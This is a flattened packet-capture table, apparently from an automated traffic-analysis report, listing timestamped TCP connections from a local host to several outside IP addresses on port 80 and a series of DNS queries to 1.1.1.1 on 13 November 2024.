                                                                                  Nov 13, 2024 15:36:21.192677021 CET805001650.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:21.198476076 CET5001680192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:21.231714964 CET805001650.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:21.235344887 CET5001680192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:22.045253038 CET5001680192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:23.065701962 CET5001780192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:23.071482897 CET805001750.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:23.073832035 CET5001780192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:23.090507984 CET5001780192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:23.095838070 CET805001750.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:23.096390009 CET805001750.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:23.778850079 CET805001750.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:23.779068947 CET805001750.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:23.779119015 CET5001780192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:23.819691896 CET805001750.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:23.819756031 CET5001780192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:24.595467091 CET5001780192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:25.611619949 CET5001880192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:25.616790056 CET805001850.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:25.616889954 CET5001880192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:25.628222942 CET5001880192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:25.633708954 CET805001850.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:26.699529886 CET805001850.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:26.699551105 CET805001850.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:26.699562073 CET805001850.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:26.700273991 CET805001850.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:26.700324059 CET805001850.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:26.700644970 CET5001880192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:26.700644970 CET5001880192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:26.705359936 CET5001880192.168.2.550.18.131.220
                                                                                  Nov 13, 2024 15:36:26.710756063 CET805001850.18.131.220192.168.2.5
                                                                                  Nov 13, 2024 15:36:40.136785984 CET5001980192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:40.142959118 CET8050019103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:40.143100977 CET5001980192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:40.162446022 CET5001980192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:40.170406103 CET8050019103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:40.879652023 CET8050019103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:40.910379887 CET8050019103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:40.910511971 CET5001980192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:41.670218945 CET5001980192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:42.691473007 CET5002080192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:42.697927952 CET8050020103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:42.703469038 CET5002080192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:42.715481043 CET5002080192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:42.721472025 CET8050020103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:43.384516954 CET8050020103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:43.415380955 CET8050020103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:43.419423103 CET5002080192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:44.217145920 CET5002080192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:45.235946894 CET5002180192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:46.101768970 CET8050021103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:46.101865053 CET5002180192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:46.119581938 CET5002180192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:46.129410982 CET8050021103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:46.129867077 CET8050021103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:46.796236038 CET8050021103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:46.826647997 CET8050021103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:46.827585936 CET5002180192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:47.623419046 CET5002180192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:48.643487930 CET5002280192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:48.650309086 CET8050022103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:48.650469065 CET5002280192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:48.659477949 CET5002280192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:48.665771961 CET8050022103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:49.327467918 CET8050022103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:49.327493906 CET8050022103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:49.331593990 CET5002280192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:49.351047993 CET8050022103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:49.352312088 CET5002280192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:49.352312088 CET5002280192.168.2.5103.224.182.242
                                                                                  Nov 13, 2024 15:36:49.362720966 CET8050022103.224.182.242192.168.2.5
                                                                                  Nov 13, 2024 15:36:54.448440075 CET5002380192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:54.454011917 CET805002376.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:54.454088926 CET5002380192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:54.477118969 CET5002380192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:54.482074976 CET805002376.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:55.119054079 CET805002376.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:55.119946003 CET805002376.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:55.120069981 CET5002380192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:55.984172106 CET5002380192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:57.001513958 CET5002480192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:57.006973982 CET805002476.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:57.007102013 CET5002480192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:57.022141933 CET5002480192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:57.027240038 CET805002476.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:57.661840916 CET805002476.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:57.662497044 CET805002476.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:57.662561893 CET5002480192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:58.529654026 CET5002480192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:59.547898054 CET5002580192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:59.612667084 CET805002576.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:59.612766981 CET5002580192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:59.629200935 CET5002580192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:36:59.634073973 CET805002576.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:36:59.634109020 CET805002576.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:00.259753942 CET805002576.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:00.260663033 CET805002576.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:00.260720015 CET5002580192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:01.139516115 CET5002580192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:02.158263922 CET5002680192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:02.163285971 CET805002676.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:02.163372993 CET5002680192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:02.174792051 CET5002680192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:02.180346012 CET805002676.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:02.845258951 CET805002676.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:02.846175909 CET805002676.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:02.851533890 CET5002680192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:02.861282110 CET5002680192.168.2.576.223.74.74
                                                                                  Nov 13, 2024 15:37:02.866877079 CET805002676.223.74.74192.168.2.5
                                                                                  Nov 13, 2024 15:37:08.934007883 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:08.938855886 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:08.939639091 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:08.955539942 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:08.960561991 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.841588974 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.841615915 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.841628075 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.841661930 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.842107058 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.842122078 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.842145920 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.842582941 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.842595100 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.842608929 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.842616081 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.842642069 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.843436956 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.843451023 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.843486071 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.847593069 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.847608089 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.847620964 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.847708941 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.888973951 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.982872009 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.982933044 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.982943058 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.982980967 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.983464003 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:09.983501911 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:09.983642101 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:10.029694080 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:10.125227928 CET8050027163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:10.125287056 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:10.467914104 CET5002780192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:11.487562895 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:11.494469881 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:11.495734930 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:11.509933949 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:11.516709089 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.388792992 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.388915062 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.388927937 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.389384031 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.389436007 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.389448881 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.389460087 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.389487982 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.389514923 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.390438080 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.390451908 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.390464067 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.390475035 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.390502930 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.390539885 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.395509958 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.395622969 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.395663977 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.529741049 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.529822111 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.529835939 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.529865026 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.530306101 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.530345917 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.530586004 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.530597925 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.530638933 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:12.670380116 CET8050028163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:12.676276922 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:13.014185905 CET5002880192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.033663034 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.038968086 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.039051056 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.055740118 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.063059092 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.064764023 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.922352076 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.922416925 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.922450066 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.922552109 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.922668934 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.922703981 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.922734022 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.923106909 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.923135042 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.923167944 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.923196077 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.923202991 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.923604012 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.924058914 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.927604914 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.928677082 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.928797007 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.928832054 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:14.928869963 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:14.983549118 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:15.064382076 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.064450979 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.064465046 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.064662933 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:15.064934015 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.064999104 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:15.065077066 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.065519094 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.067579985 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:15.206516981 CET8050029163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:15.207590103 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:15.563571930 CET5002980192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:16.580874920 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:16.711877108 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:16.714030027 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:16.723383904 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:16.731136084 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605088949 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605226040 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605449915 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605459929 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605539083 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605683088 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.605715990 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605729103 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605741024 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.605858088 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.606314898 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.606544018 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.607608080 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.612725973 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.612984896 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.613183975 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.613380909 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.613394022 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.615626097 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.738226891 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.738429070 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.738444090 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.738482952 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.738948107 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.739017010 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.739372969 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.739388943 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.739423990 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.874104977 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:17.874219894 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.875364065 CET5003080192.168.2.5163.44.185.183
                                                                                  Nov 13, 2024 15:37:17.880302906 CET8050030163.44.185.183192.168.2.5
                                                                                  Nov 13, 2024 15:37:22.942091942 CET5003180192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:22.951385975 CET8050031188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:22.951699972 CET5003180192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:22.965634108 CET5003180192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:22.972606897 CET8050031188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:24.060480118 CET8050031188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:24.060596943 CET8050031188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:24.060641050 CET5003180192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:24.061633110 CET8050031188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:24.061676025 CET5003180192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:24.467277050 CET5003180192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:25.491338015 CET5003280192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:25.496439934 CET8050032188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:25.496551037 CET5003280192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:25.513273954 CET5003280192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:25.518223047 CET8050032188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:26.214452982 CET8050032188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:26.215521097 CET8050032188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:26.215610981 CET5003280192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:26.216713905 CET8050032188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:26.216787100 CET5003280192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:27.015928030 CET5003280192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:28.101296902 CET5003380192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:28.106542110 CET8050033188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:28.106632948 CET5003380192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:28.225199938 CET5003380192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:28.234884024 CET8050033188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:28.236684084 CET8050033188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:28.802875996 CET8050033188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:28.802891016 CET8050033188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:28.802900076 CET8050033188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:28.803116083 CET5003380192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:28.804488897 CET8050033188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:28.806731939 CET5003380192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:29.732822895 CET5003380192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:30.750914097 CET5003480192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:30.757709026 CET8050034188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:30.763330936 CET5003480192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:31.157788038 CET5003480192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:31.164602995 CET8050034188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:31.485524893 CET8050034188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:31.485867023 CET8050034188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:31.486187935 CET5003480192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:31.488049984 CET8050034188.114.96.3192.168.2.5
                                                                                  Nov 13, 2024 15:37:31.488188028 CET5003480192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:31.488998890 CET5003480192.168.2.5188.114.96.3
                                                                                  Nov 13, 2024 15:37:31.494048119 CET8050034188.114.96.3192.168.2.5
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 13, 2024 15:34:05.995486975 CET6518353192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:34:06.080240965 CET53651831.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:34:22.126688004 CET5644253192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:34:22.648819923 CET53564421.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:34:36.002886057 CET5316253192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:34:36.255896091 CET53531621.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:34:50.423686028 CET4924953192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:34:51.361541986 CET53492491.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.259255886 CET6019853192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:35:05.299642086 CET53601981.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:35:19.758178949 CET6213753192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:35:20.225814104 CET53621371.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:35:33.549442053 CET5412553192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:35:33.719866991 CET53541251.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:35:47.456629038 CET5560753192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:35:48.467385054 CET5560753192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:35:49.472656965 CET5560753192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:35:50.173671007 CET53556071.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:35:50.173726082 CET53556071.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:35:50.173754930 CET53556071.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:36:04.175297022 CET5117953192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:36:04.190411091 CET53511791.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:36:17.752012014 CET4950353192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:36:17.951235056 CET53495031.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:36:31.721447945 CET6394853192.168.2.51.1.1.1
